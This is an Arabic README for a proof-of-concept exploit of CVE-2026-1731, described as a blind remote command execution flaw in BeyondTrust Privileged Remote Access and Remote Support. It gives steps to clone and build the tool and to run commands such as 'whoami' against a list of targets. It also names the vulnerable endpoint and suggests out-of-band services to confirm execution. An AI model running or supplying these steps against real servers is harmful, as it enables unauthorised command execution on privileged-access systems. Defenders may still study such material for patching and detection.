
إثبات مفهوم لاستغلال CVE-2026-1731، وهي ثغرة تنفيذ أوامر عن بُعد عمياء (blind RCE) في BeyondTrust Privileged Remote Access وRemote Support، مما يسمح بتنفيذ أوامر عن بُعد على الإصدارات المعرضة للخطر.
لمزيد من المعلومات، أنصحك بقراءة التحليل من attackerkb.com.
ستحتاج إلى الأدوات التالية لبناء هذا الـ PoC: Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 موجودًا في target/releasecd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
يمكنك تشغيل ./CVE-2026-1731 -h لعرض قائمة بالخيارات المتاحة
./CVE-2026-1731 --targets targets.txt --command "whoami"
ملاحظة: نظرًا لأن CVE-2026-1731 هو ثغرة RCE عمياء (blind RCE)، فلا يوجد استجابة تُرسل من المضيف يمكن استخدامها كمؤشر على الثغرة. قد يكون الطلب ناجحًا، لكن الهدف غير المعرّض للثغرة لن يُفعّل RCE. يُنصح باستخدام خدمة مثل webhook.site أو PortSwigger's Burp Collaborator للاختبار ضد الأهداف. يعتمد نجاح أو فشل هذا الـ PoC على ما إذا كان الخادم يستجيب برمز حالة 200 أم لا.
GET /get_rdf?comp=sdcust&locale_code=en-us.